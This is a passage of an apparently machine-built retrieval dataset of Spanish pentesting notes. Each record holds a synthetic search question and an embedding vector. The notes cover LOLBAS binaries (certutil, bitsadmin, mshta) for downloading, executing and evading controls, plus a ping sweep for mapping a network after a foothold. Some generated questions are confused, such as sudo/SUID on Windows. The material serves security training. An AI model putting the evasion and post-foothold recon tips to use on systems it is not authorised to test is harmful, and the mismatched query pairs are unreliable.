0.0395, -0.03795, -0.00469, -0.07366, -0.06178, 0.06224, 0.04802, -0.1004, -0.06726, -0.04222, 0.0387, 0.0052, -0.03388, -0.00848, 0.05801, 0.07829, -0.00364, -0.07338, 0.05927, -0.0417, 0.04772, 0.01333, 0.00158, 0.03869, -0.0494, -0.0585, 0.07522, -0.04246, 0.05049, -0.00983, 0.01382, 0.01148, -0.08293, -0.02223, -0.04671, 0.00023, -0.04893, -0.02997, -0.03427, 0.02367, 0.01274, 0.02279, -0.01445, -0.10013, -0.01534, -0.10136, -0.10158, 0.01557, 0.06362, 0.02625, -0.0693, -0.00147, 0.02873, -0.05312, -0.03728, -0.00909, -0.0222, -0.01794, -0.00879, 0.0124, 0.03005, 0.05021, -0.01854, -0.05646, 0.02278, -0.02852, 0.0312, -0.01739, -0.06591, -0.07063, -0.00159, 0.024, 0.03632, 0.02201, 0.09064, 0.05397, -0.01394, 0.02469, -0.03146, 0.09482, -0.06486, -0.02617, 0.08518, -0.04742, -0.06219, 0.0453, 0.02411, 0.02064, 0.05838, -0.02509, -0.00313, 0.04551, 0.07968, 0.05997, 0.02994, -0.00658, 0.02873, 0.04129, -0.01242, 0.05224, -0.02818, 0.05551, -0.01882, 0.01776, 0.07447, 0.04222, -0.01684, 0.03342, -0.02578, -0.04034, 0.03318, 0.07342, 0.0072, -0.06737, -0.06275, 0.0004, -0.05511, -0.05808, 0.02038, -0.04507, -0.03903, 0.05703, 0.04776, -0.06148, 0.00013, 0.02782]} -{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## LOLBAS (Windows) β€” https://lolbas-project.github.io\n- \"Living Off the Land Binaries\": binarios firmados de Windows para descargar/ejecutar/bypassear.\n- Útil para Transferencia de ficheros y evadir controles (`certutil`, `bitsadmin`, `mshta`...).", "indexar": "cual es una alternativa libre a certutil o bitsadmin para mover datos?", "v": [-0.07741, 0.01742, -0.1105, -0.09294, -0.0616, -0.08942, -0.11684, 0.03369, -0.21572, -0.0728, -0.10125, -0.25174, 0.03378, 0.07736, 0.09852, -0.14503, 0.08067, -0.1673, 0.06803, -0.07753, 0.02536, -0.03668, 0.04585, -0.056, -0.0269, 0.05954, 0.07108, 0.12025, -0.1724, 0.11646, 0.06992, -0.04689, 0.06232, 0.0359, 0.04002, 0.04743, 0.09648, 0.09896, 0.01694, -0.00935, -0.02122, -0.03136, -0.08277, 0.16412, 0.01522, -0.11108, -0.10572, 0.03213, 0.0468, -0.0349, -0.01155, 0.05156, -0.02831, -0.01518, 0.03371, -0.02185, 0.07796, -0.10976, -0.00386, -0.04674, -0.0882, 0.10336, -0.04513, 0.04251, -0.0104, 0.00608, 0.05711, 0.02798, -0.12705, 0.09393, 0.12336, 0.03225, 0.04465, 0.01047, -0.0632, -0.00122, 0.05775, -0.06598, -0.01657, 0.10768, -0.00384, 0.0477, -0.03555, 0.04605, -0.01556, -0.0511, 0.06275, -0.11902, 0.00803, 0.06333, 0.14363, 0.03301, -0.02941, 0.05498, 0.07957, 0.03574, 0.01284, -0.02521, -0.04179, 0.00676, 0.01214, 0.10338, -0.10673, -0.01079, 0.0585, 0.03335, 0.07311, 0.06277, -0.12315, -0.01324, 0.03473, 0.10472, -0.02372, 0.02801, 0.03946, -0.05632, -0.05326, 0.02705, -0.04848, 0.03451, -0.0492, -0.05284, 0.0325, -0.07201, 0.02266, 0.01688, 0.01181, 0.05809, -0.02606, 0.04192, 0.08725, -0.0459, -0.06361, -0.07386, -0.07032, 0.02469, 0.05548, -0.06951, 0.07293, -0.00771, -0.00203, 0.09321, -0.01922, 0.04182, 0.07734, 0.04898, -0.03874, 0.06422, -0.04226, -0.04685, -0.05105, 0.03274, 0.0366, 0.11149, -0.10972, 0.05501, -0.0329, -0.07987, -0.10885, 0.05154, -0.01793, 0.00304, -0.04387, 0.01766, -0.04459, -0.06278, 0.01266, 0.0013, -0.01992, -0.01091, -0.04275, 0.08641, 0.05849, -0.06324, 0.10415, -0.02471, -0.08756, -0.10743, -0.0043, -0.0978, 0.08888, -0.0234, 0.01153, 0.01289, 0.05002, -0.01144, 0.03573, -0.02737, -0.03869, 0.037, 0.00875, 0.03338, -0.05281, -0.04461, -0.00977, -0.03729, -0.0006, -0.04214, -0.01234, -0.02009, -0.00902, -0.02713, -0.01402, 0.03112, -0.01586, 0.02849, -0.01744, -0.01247, 0.07492, -0.02513, 0.05357, 0.00407, 0.03484, 0.02611, -0.08818, -0.05084, -0.02177, 0.02874, -0.01496, -0.03486, -0.00752, 0.03889, 0.01195, -0.02912, -0.04801, 0.02113, 0.02235, 0.01565, -0.0491, -0.01259, 0.04323, 0.03352, 0.02715, 0.06062, 0.0314, -0.02479, 0.01741, -0.00672, 0.02352, -0.05419, -0.00615, 0.01182, -0.04806, -0.05914, -0.03943, 0.00196, -0.06151, -0.0191, -0.042, -0.04053, -0.02474, -0.01633, -0.02171, -0.03991, 0.01, 0.05507]} -{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## CΓ³mo encaja\n- Privesc Linux β†’ GTFOBins es el segundo paso de casi todo SUID/sudo.\n- Privesc Windows β†’ LOLBAS para vivir de la tierra.\n\nRelacionado: Recursos pΓΊblicos Β· OSCP MOC", "indexar": "que programa hay para identificar permisos SUID en Linux?", "v": [-0.04495, 0.03795, -0.15227, -0.15662, 0.0585, -0.22791, -0.18331, -0.04046, -0.14208, 0.01999, 0.09837, -0.04584, 0.11529, -0.16067, 0.01098, -0.08214, -0.03013, -0.15298, 0.00611, -0.05178, 0.02217, 0.14872, -0.08158, 0.00848, 0.02127, 0.04246, 0.0944, -0.102, 0.04639, -0.04324, -0.0821, 0.03658, 0.04246, 0.01237, -0.08126, 0.02945, 0.0388, 0.06312, 0.04011, 0.07565, 0.09074, 0.04536, 0.03463, 0.05071, -0.01992, -0.21368, 0.00018, 0.00233, 0.05723, -0.11781, 0.07075, -0.00266, -0.05223, -0.08983, 0.12215, -0.02172, 0.05585, -0.10988, -0.03938, 0.07954, -0.12304, -0.0118, 0.07231, -0.01798, 0.05757, 0.04298, 0.06232, 0.01085, -0.0289, 0.04649, 0.0188, 0.05907, -0.02567, -0.01115, 0.03097, 0.0345, -0.12993, 0.02375, 0.08932, -0.05335, 0.07628, 0.02609, 0.03342, 0.06686, -0.09069, -0.14326, -0.01878, -0.01109, -0.05323, 0.05656, 0.02709, 0.09771, 0.05871, 0.07627, 0.16091, -0.00688, 0.13241, 0.12804, -0.02175, 0.01282, -0.06461, 0.01242, -0.08398, 0.12294, -0.06331, 0.07231, 0.05508, -0.0382, -0.02953, 0.03992, 0.01, -0.03826, 0.00197, 0.02007, -0.04485, 0.02673, -0.01253, -0.05355, 0.02486, -0.07889, -0.05381, 0.03363, 0.00987, 0.01763, 0.03265, -0.03078, -0.10983, 0.21376, -0.05381, -0.03027, 0.02852, -0.05318, 0.05308, 0.06193, -0.08251, 0.06175, 0.04945, -0.09921, -0.0312, 0.01384, 0.0018, 0.01234, 0.05191, 0.07298, 0.08179, 0.00747, -0.02033, -0.05151, -0.04572, -0.06418, -0.01466, 0.03031, -0.00593, 0.02852, -0.07556, 0.00935, -0.00789, -0.01797, -0.09358, -0.01039, -0.01331, -0.00726, -0.02434, -0.01235, 0.02738, 0.00362, 0.01053, 0.07457, 0.02688, 0.07486, 0.00378, 0.04081, 0.04243, -0.08407, 0.04814, -0.06682, 0.06363, -0.09789, 0.00042, -0.01468, -0.04567, 0.00443, 0.04371, -0.02832, 0.03635, -0.01052, -0.07502, 0.05025, 0.00528, 0.02466, 0.01955, 0.07684, 0.00502, -0.00487, -0.01135, 0.07188, 0.00401, 0.00382, -0.00091, -0.01676, -0.06621, 0.029, -0.02322, -0.00253, 0.02729, 0.00309, -0.04209, 0.01659, 0.02482, 0.02619, -0.00664, -0.01527, 0.05567, -0.02001, -0.00582, 0.03843, -0.00149, 0.07368, 0.05569, -0.01185, 0.02824, 0.01058, 0.07631, 0.0483, -0.01101, -0.08902, 0.03779, 0.00633, 0.05413, 0.02147, 0.04008, -0.02319, -0.00023, -0.01105, 0.01166, -0.0078, 0.00155, -0.00281, 0.00936, -0.02515, -0.03526, 0.04658, 0.03607, -0.07653, -0.04457, -0.0032, -0.03382, -0.01961, -0.02, -0.00413, -0.02098, 0.03768, 0.01438, -0.021, 0.03217, 0.02829]} -{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## CΓ³mo encaja\n- Privesc Linux β†’ GTFOBins es el segundo paso de casi todo SUID/sudo.\n- Privesc Windows β†’ LOLBAS para vivir de la tierra.\n\nRelacionado: Recursos pΓΊblicos Β· OSCP MOC", "indexar": "con que puedo encontrar vulnerabilidades relacionadas con sudo y SUID en Windows?", "v": [0.00174, 0.05079, -0.213, -0.04845, 0.00107, -0.06389, -0.12345, -0.17025, 0.02758, -0.02378, -0.01167, -0.15384, -0.03566, -0.16079, -0.16041, 0.01386, -0.07248, -0.18549, 0.01997, 0.05022, 0.1251, -0.01938, 0.02313, 0.02008, -0.065, 0.06785, 0.1017, 0.03247, -0.01048, -0.11731, -0.05288, -0.01957, -0.01169, 0.0544, -0.18028, 0.05795, 0.01273, 0.15308, 0.03988, 0.08212, 0.06045, 0.11861, -0.07737, 0.01781, 0.06927, -0.06857, -0.03873, -0.08543, 0.07159, 0.02233, -0.09369, -0.03913, -0.14061, -0.12769, 0.06691, -0.03798, 0.15228, -0.06621, 0.03317, 0.07313, -0.14451, 0.09976, 0.09943, 0.08602, 0.00288, -0.01288, -0.00109, 0.03301, -0.0385, 0.10926, -0.02358, -0.02395, -0.09459, -0.0235, 0.03422, 0.06121, -0.0239, 0.03854, 0.09723, -0.00828, 0.06125, 0.07476, 0.07305, 0.01036, -0.17863, -0.1189, -0.04832, -0.03824, 0.01984, -0.09498, 0.17457, -0.06548, -0.03561, 0.01705, 0.02958, -0.06416, 0.04479, 0.01059, -0.05099, -0.02954, -0.11484, -0.02787, 0.00028, 0.10647, -0.00978, 0.03425, -0.01371, -0.00866, -0.01961, -0.02625, -0.02465, -0.00012, -0.01358, -0.06857, -0.04129, 0.02855, -0.03726, -0.04522, 0.09121, -0.02691, -0.07863, -0.04245, -0.01886, -0.00846, -0.02038, -0.00568, -0.00157, 0.11299, -0.04278, -0.02827, 0.02852, 0.00236, -0.01784, -0.02658, -0.05184, 0.13456, 0.05315, -0.05538, 0.04317, -0.02952, 0.07524, -0.00332, 0.08826, -0.00621, -0.00883, 0.01624, 0.04225, 0.01097, -0.10225, -0.06248, -0.00225, -0.0181, -0.03252, 0.02526, -0.04445, 0.07097, 0.01523, 0.04154, 0.06057, -0.00244, 0.05563, 0.06067, -0.10522, -0.00152, -0.00101, 0.01439, -0.03135, 0.05133, 0.03605, -0.00629, -0.08875, 0.08988, 0.03126, -0.05291, 0.00817, -0.04636, 0.09494, -0.03889, -0.0111, -0.06604, -0.03695, 0.0017, 0.02629, -0.01346, 0.00509, -0.00782, -0.00901, -0.00246, -0.03578, 0.01396, -0.06533, -0.0086, 0.03268, -0.01163, 0.00574, 0.01051, -0.02768, -4e-05, -0.05187, -0.01718, -0.08438, 0.01079, -0.0657, -0.01261, 0.05263, 0.04698, -0.04693, 0.03373, 0.02192, 0.03731, -0.00987, 0.03042, 0.07359, -0.04801, -0.04183, -0.06849, 0.04889, -0.00766, 0.0062, -0.03627, -0.01314, 0.02018, 0.06764, 0.00116, -0.01153, -0.08113, -0.05551, -0.0237, -0.00425, 0.04619, 0.00357, 0.04119, -0.03845, -0.04086, 0.00933, -0.00555, 0.01308, -0.02021, -0.01425, -0.01591, -0.01687, 0.01795, 0.02436, -0.09977, -0.05137, -0.02422, -0.02085, 0.00357, 0.00332, -0.06953, 0.01364, 0.04252, 0.02479, -0.03406, -0.01676, 0.00789]} -{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## CΓ³mo encaja\n- Privesc Linux β†’ GTFOBins es el segundo paso de casi todo SUID/sudo.\n- Privesc Windows β†’ LOLBAS para vivir de la tierra.\n\nRelacionado: Recursos pΓΊblicos Β· OSCP MOC", "indexar": "cual es una alternativa libre a LOLBAS para auditorΓ­as de seguridad?", "v": [-0.02849, -0.01622, 0.03928, -0.03919, -0.16379, -0.07947, -0.03934, -0.05315, -0.14862, 0.10665, -0.09813, -0.19572, 0.01463, 0.17021, 0.12122, -0.11714, 0.07325, -0.03067, -0.01931, 0.01745, 0.04017, 0.01108, -0.18891, -0.03141, 0.05386, -0.01511, 0.0624, -0.04245, -0.02126, 0.03886, -0.08369, -0.02667, 0.08119, 0.13565, -0.0345, 0.06532, 0.14219, 0.09136, 0.12553, 0.12, 0.04101, -0.0003, 0.03008, 0.07159, 0.13357, -0.15632, -0.02777, 0.07752, 0.05335, -0.00761, -0.05266, 0.04855, -0.05084, -0.00684, 0.10206, -0.05285, 0.03906, -0.09223, 0.0092, -0.03149, -0.23289, -0.02558, 0.05851, -0.01451, -0.04458, 0.06245, 0.03522, -0.02871, 0.05155, 0.04503, 0.04455, -0.00934, -0.03758, 0.02944, -0.15977, -0.03219, -0.04071, -0.02764, -0.01604, 0.13158, 0.03671, -0.06962, 0.03506, 0.15627, -0.10553, -0.07463, -0.01501, -0.05463, -0.00772, 0.09842, 0.02149, 0.05711, -0.00611, 0.05424, -0.04431, -0.07156, 0.1234, 0.05073, -0.10262, 0.00222, -0.01257, -0.04284, -0.02412, 0.04534, 0.0292, 0.02614, -0.05092, 0.02364, 0.00395, -0.00088, -0.02213, 0.08913, -0.06553, -0.0281, 0.0192, -0.0111, 0.02101, 0.0601, 0.04229, 0.03554, 0.03864, -0.01367, -0.03945, -0.06451, 0.00557, -0.01417, 0.06667, 0.08157, -0.00166, 0.03475, 0.11846, -0.05389, -0.08196, -0.0158, -0.06617, -0.02893, -0.08045, -0.08774, -0.06551, 0.05852, -0.03743, 0.05087, 0.06978, 0.02218, 0.07134, 0.04338, 0.00275, -0.03633, -0.02597, -0.00524, -0.043, 0.02914, -0.06501, 0.04698, -0.02507, 0.06164, -0.04086, -0.02713, -0.06015, 0.05352, 0.1032, -0.01995, 0.08697, 0.02963, -0.03441, -0.02113, 0.04857, -0.07514, -0.03765, -0.05563, -0.02166, 0.04383, 0.01123, -0.04013, 0.05317, -0.04733, -0.00737, -0.12648, 0.01068, -0.11175, 0.01384, -0.01353, -0.06227, -0.01782, 0.05241, -0.11929, 0.07222, 0.02427, 0.04957, 0.04435, -0.02447, 0.00998, -0.08518, -0.01245, -0.0224, 0.00172, 0.05234, -0.14621, -0.07718, 0.02172, -0.05861, -0.04973, -0.04343, -0.02102, 0.05467, -0.00132, 0.02403, 0.04527, 0.01727, 0.02451, 0.08874, 0.02557, 0.04355, -0.01836, 0.00727, -0.0156, 0.06358, 0.00562, -0.02673, 0.02779, -0.01011, -0.01674, 0.03295, 0.00194, -0.04877, 0.00757, 0.00157, 0.03304, -0.00984, 0.00676, 0.01688, -0.02525, -0.02945, -0.00401, 0.01702, -0.00894, -0.03561, 0.01489, 0.06692, -0.06453, 0.01473, 0.02979, -0.05473, -0.02662, -0.06359, 0.00156, -0.02467, -0.00033, -0.0556, -0.01462, -0.00767, 0.0282, 0.0084, 0.0151, -0.00772, -0.03743]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Bucles bash sobre IPs\n\n> Lo que ahorra horas: enumerar **toda la red** de golpe a partir de la salida greppable de Nmap. Usa Operadores Bash.", "indexar": "que programa puedo usar para listar todas las direcciones IP de una red automΓ‘ticamente?", "v": [0.11211, 0.06555, -0.18483, -0.1645, 0.10099, -0.14666, -0.00332, -0.11199, -0.18016, -0.05055, -0.00803, -0.22641, -0.03332, -0.16089, 0.01768, 0.06205, 0.03739, -0.04416, 0.08746, -0.13107, 0.03137, 0.07177, -0.18093, -0.01094, -0.01466, 0.16617, 0.05149, -0.03169, -0.10026, -0.05668, -0.12973, -0.04463, 0.00292, -0.07632, -0.10028, -0.06289, 0.11089, 0.08247, -0.01829, 0.08372, 0.03824, 0.10924, -0.06855, 0.02049, 0.01711, 0.06025, 0.10629, -0.06683, -0.01567, -0.11262, -0.06533, -0.08679, -0.06411, -0.06389, -0.09198, -0.0472, 0.0196, -0.04517, -0.1194, 0.03778, 0.01768, 0.0638, -0.0298, 0.0797, 0.00639, -0.04234, 0.00016, 0.00116, -0.10282, 0.00275, 0.02046, 0.03516, -0.01317, 0.07217, 0.04135, 0.08435, -0.00713, -0.09079, 0.10076, 0.0213, -0.06876, 0.03266, -0.01823, 0.06012, -0.06878, -0.07841, 0.09369, -0.18164, 0.00505, -0.10045, -0.00789, 0.02045, 0.01341, 0.05936, 0.12768, -0.03585, 0.08621, 0.05963, -0.00199, 0.01836, 0.03221, 0.00411, -0.06448, 0.11539, 0.08328, 0.08229, 0.08461, 0.01849, 0.04275, 0.00214, -0.05181, -0.03243, -0.01314, -0.11692, -0.02375, -0.02691, -0.03035, -0.01801, 0.01739, -0.04431, -0.07258, 0.00454, -0.0211, 0.02372, 0.09029, 0.02049, -0.02792, 0.14737, -0.06926, 0.0443, -0.02349, 0.00706, -0.0591, -0.09788, -0.03886, -0.01738, -0.04412, -0.01235, 0.02072, 0.01427, 0.04051, 0.02044, -0.02787, -0.06475, 0.05023, -0.04069, 0.00435, -0.12552, -0.00268, 0.04719, 0.0344, 0.02989, 0.0146, 0.03205, -0.03187, 0.04365, 0.04777, -0.03627, 0.00896, 0.03294, -0.04761, -0.02984, -0.00946, -0.01599, 0.07116, -0.02222, -0.00597, 0.03644, 0.08195, 0.01811, 0.0277, 0.11193, -0.0418, -0.05411, -0.06931, -0.06094, -0.00729, -0.04259, 0.02768, -0.02276, -0.0042, 0.00731, 0.00839, -0.02139, 0.02721, -0.01841, 0.0205, 0.0021, -0.00075, 0.01978, -0.00844, -0.00289, -0.00011, 0.02226, 0.02969, -0.01591, 0.00617, -0.02774, -0.04039, -0.08943, -0.06704, 0.02388, -0.03486, 0.01964, 0.04722, 0.04045, -0.03143, 0.02754, 0.02721, 0.08121, -0.01383, -0.05157, 0.0999, -0.03595, -0.09873, 0.00018, -0.00868, -0.01422, 0.05908, -0.00066, 0.04075, 0.00361, 0.0097, 0.05854, -0.0072, 0.00453, 0.01113, 0.00206, 0.05051, 0.041, -0.03542, 0.00443, -0.0277, -0.0567, 0.02187, -0.04307, 0.01077, -0.00808, -0.01502, -0.03072, -0.03433, 0.06075, -0.00862, -0.02953, -0.01714, -0.01752, -0.0741, 0.02679, 0.00534, -0.05904, -0.03094, 0.05155, 0.03656, -0.03347, 0.01658, 0.0474]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Bucles bash sobre IPs\n\n> Lo que ahorra horas: enumerar **toda la red** de golpe a partir de la salida greppable de Nmap. Usa Operadores Bash.", "indexar": "cual es un comando bash eficiente para escanear y obtener informaciΓ³n de toda mi red?", "v": [-0.07311, 0.0006, -0.14322, -0.03157, 0.1146, -0.12618, -0.04051, -0.04581, -0.13875, 0.00923, -0.2425, -0.05685, -0.01477, -0.08826, 0.08111, 0.11266, 0.0576, 0.04889, 0.0201, -0.03613, 0.06271, -0.03515, 0.00726, 0.08771, 0.00316, 0.07961, 0.00593, -0.01107, -0.14031, 0.03968, 0.02862, 0.11345, 0.01049, -0.00177, -0.03686, 0.1094, -0.02034, 0.03554, -0.05621, 0.14085, -0.19376, -0.00892, -0.15985, -0.01137, 0.11176, -0.11809, 0.00457, 0.11045, 0.06317, 0.01624, -0.09272, -0.06899, -0.10239, -0.00304, -0.04133, -0.06749, 0.00206, -0.01229, -0.03828, 0.00874, -0.05902, -0.16792, -0.03248, 0.1167, -0.01756, 0.0304, 0.00283, -0.17094, -0.04567, 0.05025, -0.032, 0.14315, -0.07807, 0.10888, 0.03103, -0.02198, -0.06348, 0.03122, 0.10458, 0.05107, -0.01103, 0.00863, -0.13967, 0.09346, 0.00258, -0.10847, 0.02511, -0.13278, -0.01359, 0.01765, 0.01304, -0.05939, 0.01837, 0.07265, 0.07363, 0.02946, 0.04628, 0.05646, 0.00902, 0.01774, -0.05421, -0.07737, -0.13021, 0.1197, 0.08462, 0.04089, 0.02737, -0.0153, 0.00027, 0.05257, -0.02483, -0.11575, 0.03739, 0.03224, -0.04897, -0.09802, -0.08301, -0.06135, -0.03672, -0.05681, -0.14756, 0.02436, -0.01793, 0.02818, 0.01572, -0.07523, -0.02571, -0.01576, 0.03084, 0.03886, -0.04371, -0.02929, 0.0166, -0.13726, -0.01398, 0.08537, -0.05531, -0.06625, -0.05734, -0.10514, -0.05483, 0.04741, -0.06045, -0.05157, 0.01175, -0.00973, 0.08795, -0.08068, 0.00538, 0.04384, -0.0292, 0.04794, -0.0649, 0.01646, -0.01176, 0.02592, 0.01207, -0.00697, -0.04718, 0.0261, -0.04462, -0.04387, -0.05193, 0.06667, 0.02095, -0.04748, -0.05147, 0.01558, -0.01895, 0.02853, -0.03942, 0.02863, -0.07869, -0.08576, 0.00292, -0.0922, -0.00406, -0.08178, 0.01983, -0.01788, 0.06574, 0.0468, -0.02616, -0.03429, 0.01808, -0.03163, 0.02537, -0.00433, -0.01801, -0.02236, 0.03294, -0.00292, 0.01706, -0.07033, -0.03644, -0.01225, 0.00446, -0.06368, 0.00605, -0.04519, -0.07154, 0.07288, -0.0211, -0.03395, 0.0444, -0.05326, 0.00313, 0.02366, -0.01963, 0.00138, 0.0217, 0.0561, 0.04655, -0.03324, -0.08815, -0.02639, 0.07931, -0.02456, 0.00117, -0.00148, 0.01018, 0.01756, 0.03339, 0.00598, -0.02943, -0.01397, -0.0066, -0.03279, 0.01727, -0.00295, -0.02621, -0.02516, -0.00408, 0.00052, -0.01513, -0.01602, 0.04054, 0.01261, -0.01628, -0.06948, 0.02095, 0.02751, -0.03778, -0.03387, -0.0116, -0.02573, -0.09135, 0.01687, -0.03409, -0.06049, 0.00248, 0.01221, -0.00276, -0.04614, 0.02346, -0.06457]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# Bucles bash sobre IPs\n\n> Lo que ahorra horas: enumerar **toda la red** de golpe a partir de la salida greppable de Nmap. Usa Operadores Bash.", "indexar": "con que herramienta puedo sacar de Nmap la lista de IPs para procesarlas con Bash?", "v": [0.01149, -0.00994, -0.18816, -0.12303, -0.03398, -0.24183, 0.01755, -0.03058, -0.18474, 0.11912, -0.01138, -0.04576, 0.04076, -0.10265, -0.10872, 0.19504, -0.07316, -0.03249, -0.00299, 0.032, 0.02407, 0.11589, -0.15905, -0.00354, -0.07163, 0.09153, -0.07769, -0.03739, -0.25181, 0.01684, -0.17451, -0.01877, 0.00291, -0.11392, -0.04834, -0.09062, 0.01255, 0.04149, -0.03511, 0.04568, -0.05119, 0.14283, -0.06917, 0.00915, 0.0226, -0.03391, -0.01102, -0.0059, 0.01938, -0.09902, -0.03895, -0.13092, -0.07001, 0.04802, -0.09482, -0.1486, 0.08723, -0.0914, -0.03579, -0.05194, -0.10749, 0.05603, -0.04957, -0.0513, -0.02883, -0.07208, -0.05219, -0.11876, -0.01814, 0.00749, 0.0013, 0.0967, 0.00417, 0.05798, 0.01254, 0.00122, -0.00989, 0.03667, 0.05428, 0.05498, 0.00269, -0.01869, -0.11182, 0.03172, -0.05572, -0.07958, 0.06362, -0.08746, 0.04987, -0.05999, -0.02796, 0.07576, -0.01049, 0.02734, 0.06681, -0.03692, 0.09816, 0.08987, -0.0373, -0.03531, 0.0898, -0.03443, -0.14372, 0.1159, 0.03361, 0.04141, 0.08617, 0.03366, -0.05227, -0.01176, -0.00839, 0.00161, -0.01437, -0.00599, -0.01631, -0.00504, -0.07241, -0.02255, -0.0841, -0.03774, 0.04498, 0.01584, -0.02534, -0.0441, 0.05051, 0.05209, -0.07365, 0.12928, -0.01756, -0.06116, -0.00497, 0.01122, -0.05342, -0.04721, 0.00092, -0.03077, -0.02169, -0.09585, 0.02817, -0.01987, 0.04149, 0.02349, -0.00135, -0.02341, 0.07245, -0.03636, -0.01429, -0.01897, -0.04739, -0.03372, 0.05473, -0.00483, 0.05238, 0.06704, -0.07544, 0.03717, 0.01559, -0.0177, -0.0168, -0.00744, -0.08043, 0.01035, 0.02316, 0.03713, 0.03717, 0.05087, -0.01683, -0.02304, 0.10196, 0.00739, 0.0367, 0.00411, 0.00991, -0.02885, -0.01073, -0.09175, -0.0527, -0.00232, 0.0244, -0.05652, -0.02402, -0.00028, -0.03193, -0.04696, -0.04243, 0.01159, 0.01716, -0.05881, 0.02893, 0.05908, 0.01572, 0.08748, -0.01238, -0.00717, 0.03688, -0.03274, 0.01687, -0.06037, -0.01162, -0.05764, -0.06981, 0.00388, -0.05172, -0.02748, 0.01639, 0.08524, -0.04761, 0.03208, -0.01082, 0.02949, 0.03115, -0.0402, 0.04595, -0.03706, -0.05371, -0.00107, 0.02852, 0.03204, 0.00134, 0.01031, 0.04872, 0.07274, 0.04833, -0.00689, -0.02282, 0.00597, 0.02835, 0.01342, 0.01207, -0.00888, -0.01781, 0.02922, -0.01778, -0.07177, 0.03494, -0.02335, 0.02379, -0.06864, -0.03177, -0.00388, -0.00581, 0.05295, -0.02208, -0.02366, -0.05454, -0.05102, -0.04056, -0.00894, -0.00399, -0.13527, -0.03319, 0.01284, 0.08249, -0.04302, 0.04172, -0.0335]} -{"tipo": "pregunta", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Ping sweep (descubrir hosts sin nmap)\n```bash\nfor i in $(seq 1 254); do ping -c1 -W1 10.11.1.$i >/dev/null && echo \"10.11.1.$i UP\"; done\n```\n```cmd\nfor /L %i in (1,1,254) do @ping -n 1 -w 200 10.5.5.%i >nul && echo 10.5.5.%i up\n```\n(PowerShell rΓ‘pido β†’ Port scanner PowerShell). Útil tras un foothold para mapear la red interna antes de Tunneling.", "indexar": "que programa hay que usar para descubrir dispositivos en una red local sin instalar nmap", "v": [0.03305, 0.07523, -0.21365, -0.25058, 0.07521, -0.04519, -0.149, -0.02633, -0.10672, -0.05962, -0.10366, -0.12159, -0.08775, -0.11601, -0.02669, -0.02401, -0.0545, -0.12215, 0.0928, 0.02811, -0.05586, 0.038, -0.11774, 0.04805, 0.05294, 0.19749, 0.04366, -0.0547, -0.09336, -0.06416, 0.02824, 0.00262, 0.01012, -0.08354, -0.13606, -0.03891, 0.09209, -0.1174, -0.01823, 0.02193, -0.00384, 0.04282, -0.00782, 0.11137, 0.05108, 0.01417, -0.00381, -0.09712, -0.0647, 0.02953, -0.04952, 0.06482, -0.07144, -0.04328, 0.00721, -0.1176, -0.00582, -0.1014, -0.0208, 0.02429, -0.09925, 0.03216, -0.0927, 0.02601, 0.07598, -0.03986, -0.00753, 0.08047, -0.09883, -0.01307, 0.03207, -0.02294, 0.04861, 0.03428, 0.001, 0.14447, -0.05352, -0.08629, 0.15958, -0.04815, 0.05296, -0.0128, 0.02684, -0.00841, -0.06934, -0.07062, 0.1449, -0.02254, -0.00464, -0.06506, 0.00586, 0.01511, 0.05029, 0.02986, 0.058, -0.11795, 0.09788, 0.02184, 0.02933, 0.10787, 0.06463, -0.04966, -0.03569, 0.10211, -0.04794, -0.0044, 0.06793, -0.02424, 0.09195, -0.01997, 0.04506, 0.00465, -0.06013, -0.03247, -0.05533, -0.02179, 0.08251, -0.05017, -0.04661, -0.05468, -0.10539, 0.00085, 0.00365, -0.00539, 0.07976, -0.0208, -0.03164, 0.03969, -0.00605, 0.11092, 0.06406, -0.05509, 0.05336, -0.01389, -0.11026, -0.03405, -0.00829, -0.05627, -0.03916, 0.00728, 0.01026, 0.03225, -0.06166, -0.0523, 0.03742, 0.08259, -0.00858, 0.00509, 0.00487, 0.06155, 0.0326, -0.00205, -0.06581, 0.04719, -0.0627, 0.05991, 0.10612, -0.03048, -0.03219, 0.0732, -0.03037, -0.03542, 0.00797, -0.01799, -0.01046, -0.08481, -0.01838, 0.02977, 0.12967, 0.01311, -0.01767, 0.10733, 0.00018, -0.04449, 0.03067, -0.03287, 0.0446, -0.04815, 0.05998, -0.04535, -0.05155, 0.0754, 0.04543, 0.02658, -0.03284, -0.04072, -0.03605, -0.01039, -0.05745, -0.00213, -0.00182, 0.01585, 0.02248, 0.04932, 0.04094, -0.00935, -0.00608, -0.01759, -0.01265, -0.0091, -0.11082, 0.0514, -0.04141, -0.00903, 0.08508, 0.04367, -0.06578, 0.05004, -0.00123, 0.10432, 0.00755, -0.01712, 0.03077, 0.0206, -0.0478, -0.02934, -0.00401, 0.02832, 0.00862, 0.01802, 0.08777, 0.00876, 0.02943, 0.05445, -0.02719, -0.04737, 0.0144, -0.00035, 0.02479, 